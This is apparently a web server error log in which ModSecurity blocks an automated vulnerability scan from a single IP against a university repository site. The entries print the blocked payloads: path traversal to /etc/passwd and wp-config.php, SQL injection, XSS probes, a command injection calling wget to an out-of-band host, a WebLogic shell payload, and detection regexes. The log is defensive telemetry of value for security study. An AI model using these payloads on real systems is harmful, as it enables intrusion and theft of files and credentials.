[Tue Aug 29 11:45:49.345576 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-cCo-f0AAAi2x@gAAAAN"]
[Tue Aug 29 11:45:50.367501 2023] [:error] [pid 2232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-sCo-f0AAAi4NDwAAAAQ"]
[Tue Aug 29 11:45:51.396112 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAfSWmsAAAAB"]
[Tue Aug 29 11:45:56.375765 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAhlz9UAAAAi"]
[Tue Aug 29 11:46:01.373746 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAhZRikAAAAG"]
[Tue Aug 29 11:46:02.377784 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAipS4UAAAAF"]
[Tue Aug 29 11:46:02.384191 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CsCo-f0AAAhtjh0AAAAq"]
[Tue Aug 29 11:46:02.425556 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAdxUooAAAAC"]
[Tue Aug 29 11:46:07.473074 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gfpz4qpwax9gga.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAi5uCwAAAAS"]
[Tue Aug 29 11:46:09.396415 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhlz-UAAAAi"]
[Tue Aug 29 11:46:09.416891 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhlz-YAAAAi"]
[Tue Aug 29 11:46:09.475221 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhtji8AAAAq"]
[Tue Aug 29 11:46:12.551805 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAib5z8AAAAA"]
[Tue Aug 29 11:46:13.373612 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAhtjjkAAAAq"]
[Tue Aug 29 11:46:13.423977 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAi0JJ0AAAAK"]
[Tue Aug 29 11:46:13.446468 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAdxUrEAAAAC"]
[Tue Aug 29 11:46:14.368515 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FsCo-f0AAAhrqP4AAAAo"]
[Tue Aug 29 11:46:14.435628 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAi-RAEAAAAH"]
[Tue Aug 29 11:46:15.386776 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAdxUrsAAAAC"]
[Tue Aug 29 11:46:15.409424 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAdxUrwAAAAC"]
[Tue Aug 29 11:46:18.364878 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAi2yC4AAAAN"]
[Tue Aug 29 11:46:18.502634 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAi2yDQAAAAN"]
[Tue Aug 29 11:46:19.404888 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAhZRmMAAAAG"]
[Tue Aug 29 11:46:19.519850 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14G8Co-f0AAAhgoOEAAAAb"]
[Tue Aug 29 11:46:20.619712 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAhT33IAAAAD"]
[Tue Aug 29 11:46:23.435929 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14H8Co-f0AAAi0JLwAAAAK"]
[Tue Aug 29 11:46:27.443203 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAib55MAAAAA"]
[Tue Aug 29 11:46:28.382901 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAhBSIoAAAAX"]
[Tue Aug 29 11:46:28.404576 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAi0JNsAAAAK"]
[Tue Aug 29 11:46:28.500237 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAhl0DkAAAAi"]
[Tue Aug 29 11:46:29.564675 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAi0JOYAAAAK"]
[Tue Aug 29 11:46:30.699021 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAjCa8YAAAAB"]
[Tue Aug 29 11:46:30.811796 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAhtjlsAAAAq"]
[Tue Aug 29 11:46:31.376657 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAhtjl4AAAAq"]
[Tue Aug 29 11:46:31.550713 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAhtjmQAAAAq"]
